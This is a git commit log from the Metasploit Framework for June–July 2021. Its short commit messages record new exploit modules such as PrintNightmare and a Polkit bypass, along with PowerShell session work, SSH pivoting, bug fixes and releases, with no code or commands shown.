Grant Willcox 49bf54dcf8 Land #15449, Binom3 add CVE 2021-07-20 09:48:45 -05:00
pingport80 84cb67ecc0 update expand_path (powershell) 2021-07-20 20:01:18 +05:30
dwelch-r7 f6644b5ca4 Land #15436, Ensure generated JSP variable names aren't Java keywords 2021-07-20 15:31:17 +01:00
A Galway e3dbd3a990 fixes bug caused by attrs with string keys 2021-07-20 15:02:41 +01:00
pingport80 bd74afa785 add a check to see if src_file or dst_file a directory (copy_file method) 2021-07-20 19:31:21 +05:30
sjanusz 79c8f2a0f4 Ensure generated JSP variable names aren't Java keywords 2021-07-20 14:49:57 +01:00
Metasploit 29145173c2 automatic module_metadata_base.json update 2021-07-20 08:05:51 -05:00
adfoster-r7 e31190b71e Land #15443, Fix python3 compatibility with wmiexec module 2021-07-20 13:58:31 +01:00
guly ab3214dfc5 Binom3 add CVE
Binom3 add CVE
2021-07-20 14:23:05 +02:00
adfoster-r7 0e2b048d56 Land #15445, Fix the printed exploit target 2021-07-20 09:16:26 +01:00
Hakyac 2bf1c1ac26 Update modules/exploits/multi/http/wp_plugin_backup_guard_rce.rb
Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
2021-07-20 09:28:01 +02:00
Hakyac 7c14882510 Update modules/exploits/multi/http/wp_plugin_backup_guard_rce.rb
Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
2021-07-20 09:27:40 +02:00
Hakyac 2c51c2b6e4 Update modules/exploits/multi/http/wp_plugin_backup_guard_rce.rb
Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
2021-07-20 09:27:09 +02:00
Hakyac ce9a00492c Update modules/exploits/multi/http/wp_plugin_modern_events_calendar_rce.rb
Co-authored-by: adfoster-r7 <60357436+adfoster-r7@users.noreply.github.com>
2021-07-20 09:11:58 +02:00
Hakyac 5bf1a7847e Update modules/exploits/multi/http/wp_plugin_sp_project_document_rce.rb
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2021-07-20 09:09:23 +02:00
Hakyac 109ca7ec7a Update documentation/modules/exploit/multi/http/wp_plugin_sp_project_document_rce.md
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2021-07-20 09:05:27 +02:00
Hakyac f78c503f9f Update wp_plugin_sp_project_document_rce.rb 2021-07-20 09:04:12 +02:00
Spencer McIntyre 291544dec2 Update the necessary unit tests 2021-07-19 16:00:07 -04:00
Spencer McIntyre 36b8d6eb73 Fix the printed exploit target 2021-07-19 15:24:02 -04:00
pingport80 43f58e5183 add quotes for path 2021-07-19 21:44:29 +05:30
pingport80 efff8a61e7 normalize return value of cd 2021-07-19 20:40:13 +05:30
dwelch-r7 4141349106 Fix python3 compatibility with wmiexec module 2021-07-19 14:47:39 +01:00
pingport80 d7650e7055 minor fixes 2021-07-19 19:17:26 +05:30
pingport80 c6da1c170a add powershell support for some file system methods 2021-07-19 18:24:16 +05:30
test 6f43a06209 Add New TLV Structures 2021-07-17 09:28:22 -04:00
test a5b1b02197 Initial Ruby code support search_by_date 2021-07-17 09:14:05 -04:00
bwatters 4f6b6e428b Land #15440, Update metasploit payloads gem to 2.0.48
Merge branch 'land-15440' into upstream-master
2021-07-16 17:41:54 -05:00
bwatters 48d4fb02e7 Update metasploit payloads gem to 2.0.48 2021-07-16 16:16:43 -05:00
Spencer McIntyre d0b2ea632f Land #15403, Powershell file mixin methods
This changes the platform of the Powershell session to be consistent
with the others by changing the value from "win" to "windows". This also
updates about half of the methods in the file mixin with Powershell
support.
2021-07-16 14:59:28 -04:00
Grant Willcox 5aad658dae Land #15438, Add new supported eternalblue targets to documentation 2021-07-16 13:12:33 -05:00
Grant Willcox a276f336f0 Final touchup work for PR 15438 to reference kernel pool and clear some wording up 2021-07-16 13:12:14 -05:00
pingport80 44e5d48a46 add a condition to check if the session type is powershell 2021-07-16 22:05:30 +05:30
A Galway 42a751e0db Add new supported targets 2021-07-16 16:58:34 +01:00
Metasploit 843a7242f4 automatic module_metadata_base.json update 2021-07-16 09:03:19 -05:00
Grant Willcox b27676ca0a Land #15409, Improved PrintNightmare Check and DCERPC Library Bug Fixes 2021-07-16 08:54:42 -05:00
Spencer McIntyre 3098e2fcdd Update the module notes regarding instability 2021-07-16 09:03:40 -04:00
pingport80 36abd5ea3c add a check if file exists on the remote system 2021-07-16 00:52:47 +05:30
Spencer McIntyre c21598a81a Update to rex-core 0.1.17
This pulls in the changes from rapid7/rex-core#14
2021-07-15 15:11:38 -04:00
pingport80 dd11752d04 remove powershell support from get_processes because it can be achieved from the platform specific commands too 2021-07-16 00:34:42 +05:30
pingport80 ea09b035ea Merge branch 'master' into powershell_session_type_improvements 2021-07-15 23:24:45 +05:30
Metasploit 8ac6303c2a Bump version of framework to 6.0.54 2021-07-15 12:04:24 -05:00
pingport80 fd32d38a34 change cmdlet used for file_exist? 2021-07-15 20:06:29 +05:30
agalway-r7 0ca436d1e8 Land #15362, fix cmd_exec write_file & append_file 2021-07-15 10:18:50 +01:00
William Vu a6b4d203e5 Fix build 2021-07-15 02:10:24 -05:00
Metasploit 5f8f1b3451 automatic module_metadata_base.json update 2021-07-14 15:23:27 -05:00
William Vu 2f6d26a259 Land #15431, updated module credits 2021-07-14 15:15:21 -05:00
William Vu aebdc0ddfc Update module credits
Clarified contributions.
2021-07-14 15:10:25 -05:00
Spencer McIntyre 0251dff80b Add more descriptive error messages and logging 2021-07-14 14:38:33 -04:00
Spencer McIntyre 1ddcc9f12b Remove the socket in psexec
PsExec needs the socket to remain open after the session is established
in order to rebove the service. Remote TCP exploits close and remove
their sockets by default which creates a race condition that can result
in failing to cleanup the service.
2021-07-14 11:00:45 -04:00
Spencer McIntyre 7aa44a9a80 Add a couple more socket methods 2021-07-14 11:00:34 -04:00
Spencer McIntyre 06b592cfa1 Update the session initialization method 2021-07-13 17:25:19 -04:00
Spencer McIntyre 15268366e1 Fix a bug in how sockets are closed 2021-07-13 17:10:54 -04:00
pingport80 56a3710e56 fix -Recurse 2021-07-13 20:07:00 +05:30
Spencer McIntyre ed979992fd Remove a redundant print status statement 2021-07-13 10:14:16 -04:00
pingport80 0a4da1b657 add quotes to file paths 2021-07-13 18:54:12 +05:30
adfoster-r7 09fe84faed Land #15424, Add Simon Janusz to mail map 2021-07-13 11:19:28 +01:00
sjanusz 822079f71d Add Simon Janusz to mail map 2021-07-13 10:38:50 +01:00
Metasploit 149592715d automatic module_metadata_base.json update 2021-07-13 03:54:14 -05:00
adfoster-r7 57dc806522 Land #15420, Load Net::SSH for eaton xpert backdoor module 2021-07-13 09:46:49 +01:00
Metasploit 5507d1c668 automatic module_metadata_base.json update 2021-07-12 21:18:50 -05:00
William Vu 0c89862ff4 Land #15421, vmware_vcenter_vsan_health_rce fix 2021-07-12 21:07:01 -05:00
William Vu 2164d7ed5a Add log IOC 2021-07-12 20:54:54 -05:00
William Vu 6a6c08c773 Fix edge case in method overloading 2021-07-12 20:29:56 -05:00
Alan Foster ad20954e0d Load Net::SSH for eaton xpert backdoor module 2021-07-12 22:11:20 +01:00
Spencer McIntyre c593ec9e8f Fix the markdown formatting in the module docs 2021-07-12 15:03:39 -04:00
Metasploit 3c1a6a480c automatic module_metadata_base.json update 2021-07-12 13:59:05 -05:00
Spencer McIntyre ca7a330d19 Land #15383, Add VMware vCenter Server CVE-2021-21985 exploit 2021-07-12 14:43:22 -04:00
William Vu 1812a71d3d Add module doc 2021-07-12 13:07:05 -05:00
William Vu d29532d4c4 Add VMware vCenter Server CVE-2021-21985 exploit 2021-07-12 13:07:05 -05:00
Spencer McIntyre 32eab49428 Fix a typo in the module description 2021-07-12 12:20:37 -04:00
Spencer McIntyre a3dd916949 Restore the original stub data for FAULT 2021-07-12 11:27:26 -04:00
Metasploit 72eb22f55d automatic module_metadata_base.json update 2021-07-12 09:42:02 -05:00
Spencer McIntyre 915e5f47fb Land #15417, Fix #15254, set dynamic cached size on powershell payloads 2021-07-12 10:34:25 -04:00
Spencer McIntyre beb39ae5bc Mark another Powershell payload as dynamic 2021-07-12 10:06:56 -04:00
Spencer McIntyre a23ef5ec5d Set dynamic cached size on reverse powershell 2021-07-12 09:22:59 -04:00
Yann Castel 4d016a3521 correct CVE id 2021-07-12 14:35:47 +02:00
Hakyac d26d9f50fa Update wordpress_plugin_backup_guard_rce.md 2021-07-12 14:29:35 +02:00
Hakyac ba69294967 Update wp_plugin_sp_project_document_rce.md 2021-07-12 14:28:35 +02:00
Yann Castel 6934ec7d18 initial commit 2021-07-12 14:25:38 +02:00
Tim W 6300518e19 Fix #15254, set dynamic cached size on powershell payloads 2021-07-12 12:55:24 +01:00
Metasploit 5c7d282070 automatic module_metadata_base.json update 2021-07-12 06:28:12 -05:00
Tim W 39455827aa Land #15254, use obfuscated powershell protection bypasses 2021-07-12 12:20:17 +01:00
Yann Castel f886ff0a22 now using Metasploit's Wordpress lib 2021-07-12 11:00:43 +02:00
Yann Castel 5cd32cdb36 add references + worpress website check 2021-07-12 10:46:58 +02:00
Yann Castel 20a8aac286 now using Metasploit's Wordpress lib 2021-07-12 10:10:34 +02:00
Metasploit 0226be575c automatic module_metadata_base.json update 2021-07-09 17:09:37 -05:00
Grant Willcox 02ecc22751 Land #15386, Add module for CVE-2021-35464; pre-auth RCE in ForgeRock AM (and OpenAM) server 2021-07-09 17:01:25 -05:00
Grant Willcox 5c8aa9b802 Add in ForgeRock demonstration and fix up some last minor issues with the documentation to make it more accurate 2021-07-09 16:43:25 -05:00
Spencer McIntyre 8ab78da7b5 Raise more descriptive exceptions 2021-07-09 17:14:54 -04:00
Spencer McIntyre fba838f4e8 Update docs, pin version and fix the check method 2021-07-09 16:39:58 -04:00
Spencer McIntyre 9e61bf5752 Update the rex-powershell gem and unit tests 2021-07-09 15:35:37 -04:00
Spencer McIntyre 8e98abe867 Fix DCERPC's read method for fragments
The DCERPC's read method would only read one fragment of data which
caused the response to be corrupted when the data wouldn't fit into
a single fragment.
2021-07-09 13:48:35 -04:00
Grant Willcox 89b36bd1b8 Fix a small error in the logic so that we check the response body vs the response itself as per wvu's comment 2021-07-09 12:26:57 -05:00
Spencer McIntyre e155bb64cd Improved check method for PrintNightmare 2021-07-09 12:15:39 -04:00
Metasploit 10ab956c3f automatic module_metadata_base.json update 2021-07-09 09:07:13 -05:00
Christophe De La Fuente a5117119ee Land #15154, process memory dump post module 2021-07-09 15:49:47 +02:00
Christophe De La Fuente 8b4bce35ca Fix issues from rubocop and msftidy_docs.rb 2021-07-09 15:47:11 +02:00
Christophe De La Fuente 5a71e7b0ee Merge remote-tracking branch 'upstream/pr/15154' into HEAD 2021-07-09 15:32:04 +02:00
Metasploit f09fb52685 automatic module_metadata_base.json update 2021-07-09 06:30:52 -05:00
adfoster-r7 f189724174 Land #15217, Combine eternalblue modules 2021-07-09 12:23:34 +01:00
dwelch-r7 6817d0a0ee Land #15382, Add tests for aux and exploit cmd_check and cmd_run 2021-07-09 11:03:12 +01:00
Yann Castel d9233b9d98 typo 2 2021-07-09 11:54:25 +02:00
Yann Castel 3f2d7cda10 typo 2021-07-09 11:51:52 +02:00
Yann Castel 920b88a2bd initial commit 2021-07-09 11:49:53 +02:00
Stephen Bradshaw edf99d06d2 Update modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb
Suggested change

Co-authored-by: dwelch-r7 <Dean_Welch@rapid7.com>
2021-07-09 13:27:15 +10:00
wvu aefd2cfd38 Fix CVE references 2021-07-08 22:21:28 -05:00
Metasploit 57fa188b10 automatic module_metadata_base.json update 2021-07-08 22:15:25 -05:00
William Vu 5447f09d2f Land #15407, backported module print changes 2021-07-08 22:06:40 -05:00
William Vu 6fbaecf919 Backport print changes to recent modules 2021-07-08 21:26:35 -05:00
William Vu 25ff7dbc3e Land #15405, Gemfile.lock update 2021-07-08 19:07:58 -05:00
William Vu bc2776a55d Update Gemfile.lock 2021-07-08 18:47:04 -05:00
Metasploit 93b5fbeb17 automatic module_metadata_base.json update 2021-07-08 17:05:22 -05:00
Grant Willcox 55f7bfe11d Land #15368, Polkit D-Bus Authentication Bypass and Privilege Escalation (CVE-2021-3560) 2021-07-08 16:56:31 -05:00
Grant Willcox 570ba091f6 Update some typos in the documentation and also update the exploit module to handle various cases whereby the dbus-send command might end up timing out due to TIMEOUT being too low and to fix some final issues found during testing 2021-07-08 16:24:01 -05:00
Grant Willcox 9f88ef0954 Fix up review comments 2021-07-08 16:22:29 -05:00
Jack Heysel 54ee8f7ae7 Added cmd_delay nil check, updated title 2021-07-08 16:20:45 -05:00
Jack Heysel 0f67dd5212 Fixed get_cmd_delay, reponded to comments 2021-07-08 16:20:38 -05:00
Jack Heysel 9a07039e7e Updated docs 2021-07-08 16:09:15 -05:00
Jack Heysel fdbf669da2 Fixed check for /bin/su 2021-07-08 16:09:12 -05:00
Jack Heysel 285a6338fa Print error instead of failwith when exploit commands unsuccessful 2021-07-08 16:09:12 -05:00
Jack Heysel f797f30651 Fixed call to write directory 2021-07-08 16:09:04 -05:00
Jack Heysel 1a73cfbe25 Updated check method 2021-07-08 16:09:03 -05:00
Jack Heysel c5a9ecd45b WritableDir as advanced opt 2021-07-08 16:09:03 -05:00
Jack Heysel f87f831aba Module updates + Docs 2021-07-08 16:09:02 -05:00
Jack Heysel 8d2d445699 Send one large command over many of smaller size 2021-07-08 16:08:36 -05:00
Jack Heysel e7608d79f6 Polkit authentication bypass 2021-07-08 16:08:33 -05:00
Grant Willcox 8b3d057e9e Address Spencer's comments by adding in an extra nil check and removing an unneeded library import 2021-07-08 13:07:51 -05:00
A Galway cb31ffd82f add support for authenticated login with smb1 2021-07-08 18:41:54 +01:00
pingport80 a166afd958 change powershell platform to windows from win 2021-07-08 22:37:14 +05:30
Metasploit 7d5b15ef09 Bump version of framework to 6.0.53 2021-07-08 12:04:39 -05:00
A Galway ccf5c36c44 combine both verseions of eb into a single module 2021-07-08 17:42:35 +01:00
A Galway 88e64fcfae eternalblue_win8 ported from python to ruby 2021-07-08 17:42:30 +01:00
pingport80 4e52d2d55b fix minor issues which appeared while testing 2021-07-08 22:03:14 +05:30
Alan Foster e5241b412a Add tests for aux and exploit cmd_check and cmd_run 2021-07-08 17:32:52 +01:00
dwelch-r7 6dd298ebb7 Land #15390, Add tests for argument parsing 2021-07-08 16:19:37 +01:00
Yann Castel 38cdad47c0 initial commit 2021-07-08 16:53:37 +02:00
pingport80 66e8872ea8 add powershell support to get_processes 2021-07-08 20:21:08 +05:30
Metasploit e2be257581 automatic module_metadata_base.json update 2021-07-08 08:36:11 -05:00
Spencer McIntyre dc9c0035ab Land #15371, check if apport-cli is in $PATH
Fixes #15370
2021-07-08 09:28:35 -04:00
Spencer McIntyre 636b790acb Update to using the AutoCheck mixin 2021-07-08 09:03:42 -04:00
pingport80 02be075c2d add powershell support to get_processes 2021-07-08 16:19:53 +05:30
pingport80 14796f9438 add powershell support to some file system methods 2021-07-08 16:08:43 +05:30
Metasploit 72076efbaf automatic module_metadata_base.json update 2021-07-08 02:45:17 -05:00
William Vu f688b33a02 Land #15401, weblogic_admin_handle_rce heredoc fix 2021-07-08 02:36:53 -05:00
William Vu fc1a34d7b1 Improve here doc formatting 2021-07-08 01:19:21 -05:00
Metasploit 4f478424b7 automatic module_metadata_base.json update 2021-07-07 17:13:53 -05:00
Grant Willcox e9c748cccc Land #15385, Add Module For CVE-2021-1675 / CVE-2021-34527 AKA PrintNightmare 2021-07-07 17:05:40 -05:00
Grant Willcox 70fd9376e3 Final documentation improvements to explain SMB setup and improvements to module to fix one minor error output 2021-07-07 17:05:22 -05:00
Spencer McIntyre f42aa3742c Automatically reconnect to the named pipe 2021-07-07 13:25:51 -04:00
Metasploit 43d2d52d12 automatic module_metadata_base.json update 2021-07-07 00:00:58 -05:00
William Vu 1016c9ea68 Land #15398, CheckCode fix for HyperFlex exploit 2021-07-06 23:49:51 -05:00
William Vu 8cd00bcb91 Update module doc 2021-07-06 22:25:35 -05:00
William Vu af986380d3 Fix CheckCode
It's closer to CheckCode::Appears than CheckCode::Vulnerable.
2021-07-06 22:22:27 -05:00
William Vu 5d0191263c Land #15399, AutoCheck UX improvements 2021-07-06 22:20:33 -05:00
William Vu 6196037fba Update spec 2021-07-06 21:52:41 -05:00
Pedro Ribeiro 55dd212137 Merge branch 'rapid7:master' into master 2021-07-07 09:22:35 +07:00
William Vu ccf6ec9628 RuboCop selectively 2021-07-06 21:14:48 -05:00
William Vu e5fee3b0b8 Improve AutoCheck prints 2021-07-06 21:14:48 -05:00
Spencer McIntyre f74903178e Add a check method that detects the service 2021-07-06 17:29:08 -04:00
Spencer McIntyre d5d48949b2 Update PrintNightmare module docs 2021-07-06 16:30:51 -04:00
Spencer McIntyre a0bd903b50 Update module docs and the TARGETURI option 2021-07-06 15:52:50 -04:00
Grant Willcox 0eb2b71244 Land #15320, Enables powershell sessions to use the read_file method 2021-07-06 13:37:29 -05:00
Grant Willcox b4fed72328 Add in a small additional fix to properly check session.platform until a full fix can be implemented 2021-07-06 13:37:01 -05:00
Spencer McIntyre bfc45359ff More documentation updates and address PR feedback 2021-07-06 11:27:06 -04:00
Metasploit 688ad68db3 automatic module_metadata_base.json update 2021-07-06 10:15:07 -05:00
agalway-r7 410493f729 Land #15318, NSClient priv esc post module 2021-07-06 16:07:30 +01:00
Grant Willcox 104ddd9b26 Bump version of Metasm while we are at it so this fixes both the current issue and also imports the related changes made in Metasm 2021-07-06 09:29:15 -05:00
Grant Willcox c3406514ab Apply fixes to prevent EXEs from being used as template files if they don't have any exports 2021-07-06 09:27:09 -05:00
Spencer McIntyre deb78275d0 Make the requested documentation changes 2021-07-06 09:55:19 -04:00
Spencer McIntyre 0f9b913b0f Remove the RPORT redefinition 2021-07-06 09:29:01 -04:00
Hakyac 8b0c4a1042 Update modules/exploits/windows/local/nscp_pe.rb
Co-authored-by: agalway-r7 <agalway@rapid7.com>
2021-07-06 11:18:56 +02:00
Yann Castel 1a057d321b rhost is working 2021-07-05 10:24:49 +02:00
Alan Foster 7f883f14a5 Add tests for argument parsing 2021-07-04 18:03:33 +01:00
adfoster-r7 3fa688e8db Land #15389, update typo in documentation 2021-07-04 17:41:27 +01:00
miralayipouya 252325f1e3 Update payload.rb 2021-07-04 15:00:07 +04:30
Spencer McIntyre 040636d4f4 Land #15366, Add limit to size of history files
Fixes #15360
2021-07-02 17:28:25 -04:00
bwatters 0a43ec7e4a Add module for CVE-2021-35464; pre-auth RCE in ForgeRock OpenAM server 2021-07-02 16:05:39 -05:00
Spencer McIntyre 9c6b023b0d Add PrintNightmare module docs 2021-07-02 16:00:39 -04:00
Spencer McIntyre dfa91961f7 Use enumeration to find target directories 2021-07-02 15:39:00 -04:00
Spencer McIntyre d9ecfb823f Add DCERPC plumbing for EnumPrinterDrivers 2021-07-02 12:10:00 -04:00
Gaurav Purswani 25d4a71ef8 Add rescue for load error in case pry gem is not present
Co-authored-by: Jeffrey Martin <jeffrey_martin@rapid7.com>
2021-07-02 08:11:27 +05:30
Gaurav Purswani ff7625ed7d Update lib/rex/ui/text/shell.rb
Co-authored-by: Jeffrey Martin <jeffrey_martin@rapid7.com>
2021-07-02 08:10:55 +05:30
Gaurav Purswani ca5b8516ce Merge pull request #2 from jmartin-r7/proposed-terminal-context
adjust history context to thread file write
2021-07-02 08:08:56 +05:30
Spencer McIntyre b9830487de Add targets for older versions of Windows 2021-07-01 17:48:21 -04:00
Spencer McIntyre 9dea8b5f99 Define necessary flags and print target info 2021-07-01 16:01:07 -04:00
Spencer McIntyre f6279ee9bc Randomize the name and catch some errors 2021-07-01 14:00:51 -04:00
Metasploit 19574414a4 Bump version of framework to 6.0.52 2021-07-01 12:05:27 -05:00
Spencer McIntyre e44eb0005e Initial PrintNightmare PoC 2021-07-01 12:32:43 -04:00
Jeffrey Martin 9e447d33a5 ensure final history write 2021-07-01 09:19:45 -05:00
Jeffrey Martin 35189dbc9a reverse commands when pulled from queue 2021-07-01 08:17:42 -05:00
Gaurav Purswani 5115651f11 Update history_manager.rb 2021-07-01 16:58:00 +05:30
Metasploit 4c3196bcd6 automatic module_metadata_base.json update 2021-06-30 14:00:49 -05:00
Spencer McIntyre 91cf1c93aa Land #15107, Docker Container Escape CVE-2019-5736 2021-06-30 14:52:54 -04:00
Hakyac 2085c2db13 Update modules/exploits/windows/local/nscp_pe.rb
Co-authored-by: agalway-r7 <agalway@rapid7.com>
2021-06-30 20:28:35 +02:00
Grant Willcox b146b07382 Updated Setting Up a Metasploit Development Environment (markdown) 2021-06-30 12:32:57 -05:00
Grant Willcox bdab06ec47 Add in clarification around SSH keys per various user's comments. 2021-06-30 12:16:33 -05:00
Christophe De La Fuente daa5b32393 Update from review
- Remove `MeterpreterTryToFork` option logic
- Add `Prepend` code directly under `Payload` info
- Rebase to use the updated `PrependFork`
- Add logic to verify that shells specified in the options really exist
  on the remote host
2021-06-30 18:13:35 +02:00
Spencer McIntyre f66a64d2fb Update the ssh_login_pubkey module 2021-06-30 09:51:52 -04:00
Spencer McIntyre 46a877678d Refactor some channel related Meterpreter code
This makes some of the channel related Meterpreter code accessible to
other locations in the framework which enables other sessions to also
support pivoting capabilities.
2021-06-30 09:25:25 -04:00
Spencer McIntyre 7bddaeb74f Add documentation for the new session 2021-06-30 09:00:13 -04:00
Christophe De La Fuente eca20bec92 Update from code review
- Fix documentation typos
- Rename `MeterpreterBackground` Mettle option to `MeterpreterTryToFork`
2021-06-30 11:02:11 +02:00
Christophe De La Fuente ccaedd6c9a Last additions and improvements
- add binaries
- add documentation
- backup `runc` binary in the exploit C file
- add `MeterpreterBackground` options to set Mettle `background` option
- add `WsfDelay` logic
- refactor code
- add cleanup logic
- add restore `runc` binary logic
2021-06-30 11:02:11 +02:00
Christophe De La Fuente 1b59b8c83e Rebase and fix conflicts in lib/msf/core/post/common.rb 2021-06-30 11:02:11 +02:00
Spencer McIntyre 208ab470e7 Switch from stderr to proper logging 2021-06-29 18:29:14 -04:00
bwatters 2effd46bc6 Updated with changes requested by adfoster 2021-06-29 14:51:40 -05:00
Spencer McIntyre 51f8808bed Fix the representation of IPv6 addresses 2021-06-29 14:21:36 -04:00
Spencer McIntyre 4c925ce686 Add the channel's #read method 2021-06-29 13:40:21 -04:00
Spencer McIntyre a6b5c89b1d Cleanup channels when the session is closed 2021-06-29 09:55:35 -04:00
Jeffrey Martin e85a31c36a write new instead of append
Co-authored-by: Gaurav Purswani <43883877+pingport80@users.noreply.github.com>
2021-06-29 08:17:47 -05:00
Spencer McIntyre 2c2ae2581a Make the session a channel container 2021-06-28 17:43:57 -04:00
Spencer McIntyre 1aef1658b0 Handle ssh channel failures and timeouts 2021-06-28 16:47:14 -04:00
Jeffrey Martin 8e716b56a9 adjust history context to thread file write
By moving writes to a thread and allowing short circuit when
a context is reloaded quickly this code can shorten the conditions
that would cause slow context transitions.  This also restricts
history length to a defined constant applied to each context.
2021-06-28 15:01:10 -05:00
Gaurav Purswani c7749fa2c3 Update lib/rex/ui/text/shell.rb
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2021-06-28 19:35:19 +05:30
Metasploit 2fa2709eac automatic module_metadata_base.json update 2021-06-28 04:58:18 -05:00
adfoster-r7 2067e1177e Land #15363, Fix ipmi_dumphashes - session refused after few failed attempts 2021-06-28 10:50:41 +01:00
Hynek Petrak 50a24bf198 handle raw-sha256, ignore *LK*, *NP* 2021-06-28 10:41:45 +02:00
Hynek Petrak 059189d4a4 fix ipmi disconnects after few failed attemts 2021-06-27 22:53:27 +02:00
Hynek Petrak 348c5e2e30 remove null character from base_dn 2021-06-27 22:51:39 +02:00
Spencer McIntyre 233d353403 Fix how the address of forwarded connections
The rstream is the command shell stream which is not the same as the
underlying network transport. In order for the session's connection
information to be reported properly (as represented by the output of
`sessions`) the SSH connection socket needs to be set as #sock.
2021-06-25 21:59:27 -04:00
Spencer McIntyre a6afac608b Squash some unnecessary code 2021-06-25 21:19:05 -04:00
Spencer McIntyre f01e4a4408 More work on SSH pivoting 2021-06-25 21:19:05 -04:00
Spencer McIntyre 10ad84434c Initial support for pivoting over SSH 2021-06-25 21:19:05 -04:00
Metasploit 04a8652b83 automatic module_metadata_base.json update 2021-06-25 16:29:57 -05:00
Shelby Pace a2a1b91a69 Land #15341, add wpdiscuz exploit 2021-06-25 16:22:02 -05:00
Shelby Pace f24a01945c fix rubocop error 2021-06-25 15:33:45 -05:00
Alexandre ZANNI 167e33dac0 safe navigation operator on res 2021-06-25 17:09:20 +02:00
pingport80 b404c90830 disable pry history by default when used as break points 2021-06-25 20:35:52 +05:30
Shelby Pace 6d13f0627e formatting changes 2021-06-25 16:20:42 +02:00
Shelby Pace 1194e7d0f3 add guards, adjust formatting, add docs 2021-06-25 16:20:42 +02:00
Brendan Coles d40656b852 apport_abrt_chroot_priv_esc: check if apport-cli is in $PATH 2021-06-25 11:48:16 +00:00
pingport80 1215ea2946 add rescue for interrupt 2021-06-25 16:21:22 +05:30
Hakyac 6cacc9d686 Update modules/auxiliary/gather/http/cve_2021_27850_apache_tapestry_hmac_key.rb
Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
2021-06-25 10:40:34 +02:00
Hakyac 719cbc175a Update modules/auxiliary/gather/http/cve_2021_27850_apache_tapestry_hmac_key.rb
Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
2021-06-25 10:38:24 +02:00
Hakyac 5aaaf1e1f1 Update modules/auxiliary/gather/http/cve_2021_27850_apache_tapestry_hmac_key.rb
Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
2021-06-25 10:33:11 +02:00
Hakyac d5f0bf8425 Update modules/auxiliary/gather/http/cve_2021_27850_apache_tapestry_hmac_key.rb
Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
2021-06-25 10:33:03 +02:00
Hakyac f961b534b0 Update modules/auxiliary/gather/http/cve_2021_27850_apache_tapestry_hmac_key.rb
Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
2021-06-25 10:32:46 +02:00
Hakyac 79e83f1010 Update modules/auxiliary/gather/http/cve_2021_27850_apache_tapestry_hmac_key.rb
Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
2021-06-25 10:31:06 +02:00
wvu 88f07e6388 Once more, with feeling 2021-06-24 18:51:37 -05:00
wvu 36d8442bbe Update note about bundle install 2021-06-24 18:49:26 -05:00
wvu f973d9c682 Updated Landing Pull Requests (markdown) 2021-06-24 18:20:02 -05:00
Metasploit 95e5830bc8 Bump version of framework to 6.0.51 2021-06-24 12:04:41 -05:00
Metasploit d8e508349e automatic module_metadata_base.json update 2021-06-24 11:07:15 -05:00
Spencer McIntyre 9cc17095d4 Land #15282, CVE-2019-15975 Cisco DCNM auth bypass 2021-06-24 11:59:21 -04:00
Metasploit 5c7bf43246 automatic module_metadata_base.json update 2021-06-24 10:51:21 -05:00
Shelby Pace 3c7d96695e Land #15349, add rConfig vendors auth rce 2021-06-24 10:43:18 -05:00
Spencer McIntyre fe6b725d3f Update the documentation and fix a couple of bugs 2021-06-24 11:19:26 -04:00
Yann Castel 5ac025477a parent e7983c3b6f
author Yann Castel <yann.castel@orange.com> 1622466490 +0200
committer Spencer McIntyre <Spencer_McIntyre@rapid7.com> 1624547674 -0400

Add an exploit for CVE-2019-15975 (Cisco DCNM)

add documentation

passed rubocop

edit documentation

set ssl to true by default

edit documentation

rubocop again

int return code was replaced by symbols

Update modules/auxiliary/admin/networking/cisco_dcnm_auth_bypass.rb

Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>

rubocop ok

various changes

Update modules/auxiliary/admin/networking/cisco_dcnm_auth_bypass.rb

Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>

Update modules/auxiliary/admin/networking/cisco_dcnm_auth_bypass.rb

Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>

various changes 2

various changes

Update modules/auxiliary/admin/networking/cisco_dcnm_auth_bypass.rb

Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>

adding some guards + module notes
2021-06-24 11:19:25 -04:00
Shelby Pace 9f864df5f1 use Rex::Version instead of Gem::Version 2021-06-24 10:14:17 -05:00
Shelby Pace df1faf85ff rename files, change version check, use cookie jar 2021-06-24 09:47:38 -05:00
adfoster-r7 2535c702bc Land #15367, lock reline until decision on Fiddle can be made 2021-06-24 15:41:58 +01:00
Jeffrey Martin d111dd0848 lock reline until decision on Fiddle can be made 2021-06-23 15:44:43 -05:00
pingport80 1b816596bf update size to 2000 2021-06-23 23:49:13 +05:30
pingport80 8187a58549 add limit to size of history_files 2021-06-23 23:04:49 +05:30
bwatters a876500c5b Update comments and refactor substring range to Ruby 2.5 standards for RSPEC 2021-06-23 09:19:43 -05:00
Metasploit 2a6caae215 automatic module_metadata_base.json update 2021-06-22 16:23:40 -05:00
Shelby Pace c3d4bb42bd Land #15358, use valid python binary in sshexec 2021-06-22 16:15:36 -05:00
bwatters 71db2fd698 Burn all silent rescue alls to the ground 2021-06-22 10:56:46 -05:00
bwatters e24dc806da Fixed append and file write for windows 2021-06-22 09:34:54 -05:00
Stephen Bradshaw fc509644e7 Fix bug 15218 authentication issue in ssh_login_pubkey 2021-06-22 11:19:01 +10:00
Metasploit 623b9a2194 automatic module_metadata_base.json update 2021-06-21 03:10:38 -05:00
adfoster-r7 fe41a6b518 Land #15350, fix shellcode_inject module 2021-06-21 09:03:26 +01:00
pingport80 27954cc4ae update checkvm module to include system specific mixin 2021-06-20 10:34:18 +05:30
Spencer McIntyre b85031ff6a Fallback to Python3 in sshexec when it's available 2021-06-18 13:35:23 -04:00
